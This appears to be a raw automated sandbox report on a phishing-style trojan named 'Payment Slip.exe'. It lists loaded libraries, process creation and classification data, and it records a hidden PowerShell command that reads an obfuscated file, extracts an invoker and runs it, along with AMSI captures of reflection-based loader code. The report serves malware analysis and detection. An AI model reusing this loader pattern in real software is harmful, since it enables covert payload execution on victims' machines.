Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E836F0	7_2_04E836F0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E841BC	7_2_04E841BC
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E80D88	7_2_04E80D88
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E81470	7_2_04E81470
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E81B50	7_2_04E81B50
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E82920	7_2_04E82920
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E82238	7_2_04E82238
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E83008	7_2_04E83008
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E836E1	7_2_04E836E1
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E82FFB	7_2_04E82FFB
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E808DE	7_2_04E808DE
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E8146B	7_2_04E8146B
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E80960	7_2_04E80960
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E80D79	7_2_04E80D79
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E80040	7_2_04E80040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E82229	7_2_04E82229
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E81B3F	7_2_04E81B3F
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E80006	7_2_04E80006
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E80A10	7_2_04E80A10
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E82911	7_2_04E82911

PE / OLE file has an invalid certificate

Source: Payment Slip.exe

Static PE information: invalid certificate

Uses 32bit PE files

Source: Payment Slip.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/11@5/5

Source: C:\Users\user\Desktop\Payment Slip.exe

Code function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004045C8

Source: C:\Users\user\Desktop\Payment Slip.exe

Code function: 0_2_0040206A CoCreateInstance,

0_2_0040206A

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3148:120:WilError_03

Source: unknown	Process created: C:\Users\user\Desktop\Payment Slip.exe "C:\Users\user\Desktop\Payment Slip.exe"
Source: C:\Users\user\Desktop\Payment Slip.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Masculinity.exe "C:\Users\user\AppData\Local\Temp\Masculinity.exe"
Source: C:\Users\user\Desktop\Payment Slip.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Masculinity.exe "C:\Users\user\AppData\Local\Temp\Masculinity.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Torosity $Politimssigasiliscan $Socialpdagoger), (Ionoxalis163 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:hebrisk = [AppDomain]::CurrentDomain.GetAsse
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Afrormosia)), $Pleurocentesis).DefineDynamicModule($Greenwithe, $false).DefineType($Gwragedd, $Lynche, [System.MulticastDelegate])$Non

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_071CC93B pushfd ; ret	2_2_071CC93C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_071CC926 pushfd ; ret	2_2_071CC927
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_3_0019CA98 pushfd ; retf 0019h	7_3_0019CA99
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_3_0019EE18 push eax; iretd	7_3_0019EE65
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_3_0019EE8C push eax; iretd	7_3_0019EEA9
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_3_0019CF4C push eax; iretd	7_3_0019CF4D
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_00159C30 push esp; retf 0017h	7_2_00159D55

Source: C:\Users\user\Desktop\Payment Slip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
